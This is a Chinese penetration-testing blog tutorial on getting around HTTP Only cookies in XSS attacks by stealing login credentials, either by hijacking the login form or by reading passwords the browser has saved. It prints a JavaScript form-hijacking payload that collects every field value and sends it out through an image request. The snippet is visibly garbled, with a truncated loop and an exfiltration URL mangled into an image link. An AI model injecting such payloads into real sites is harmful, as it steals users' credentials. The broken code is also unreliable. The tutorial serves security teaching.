今天继续给大家介绍渗透测试相关知识,本文主要内容是HTTP Only下的XSS攻击。
免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试!
在上文HTTP Only限制XSS盗取COOKIE中,我们介绍过,如果网站设置了HTTP Only的COOKIE,那么我们无法通过Javascript脚本代码获得COOKIE。但是XSS获得COOKIE的实质目的是能够获得用户的凭证登录系统,因此我们从这个思路出发,如果我们能够通过XSS漏洞拿到目标用户的用户名和密码,一样可以得到与获得COOKIE相同的结果。 我们有两种手段可以实现这一操作。一种是在用户输入用户名和密码时,通过XSS漏洞直接获得用户输入的用户名和密码。这种方式难点在于将XSS脚本代码插入到登录框中,而这种地方一般很少会存在XSS漏洞点。另一种是如果用户将用户名和密码存储在了浏览器中,控制XSS拿到用户在浏览器中的用户名和密码。 接下来,我们就对这两个思路进行验证。
如果我们想用表单劫持绕过HTTP Only,那么我们需要把Javascript脚本插入到系统登录框中。这当然是一个比较麻烦的事情,因为在通常情况下,系统的登录框没有允许类似留言板这样的可以交互的点。 这一功能当然可以使用一些XSS平台来实现,但是很遗憾的是,我没有找到存在这个功能并且这个功能还使用正常的XSS平台。因此,我不得不手动简单的写了一个Javascript脚本和PHP脚本,用于展示这个功能。 Javascript脚本如下所示:
var f=document.forms['【form的name】'];if(f==undefined){ f=document.getElementById('');}var func=f.onsubmit;f.οnsubmit=function(event){ var str=''; for(var i=0;i { str+=f.elements[i].name+':'+f.elements[i].value+'||'; } str=str.substr(0,str.length-2); var img=new Image(); img.src='https://img.php1.cn/3cd4a/1e618/c5a/d5d40da532c3a782.png"/> 当我们登录后,就可以看到劫持的表单信息了,如下所示:
除了进行上述表单劫持的方法外,我们还可以读取浏览器记住的明文密码。当前的浏览器一般都有这个功能,当登录系统时,会询问是否记住用户名和密码。这也是为什么我们在登录网站时,浏览器会帮助我们自动的输入这些用户名和密码。然而问题在于,对于有些安全意识比较高的用户来说,如果不开启这项功能,即不让浏览器存储用户名和密码,那么我们就无法使用这种方式。 使用这种方式,我们还是借助XSS平台的相关模块,模块介绍如下所示: 使用这个模块我们要输入要读取的用户名和密码框中的type、name和id三个信息。wordpress网站这三个信息如下所示: 我们根据这三个信息来配置该模块的参数,如下所示: 配置完成后,我们就可以获取登录的用户名和密码了,结果如下所示: 原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200
京公网安备 11010802041100号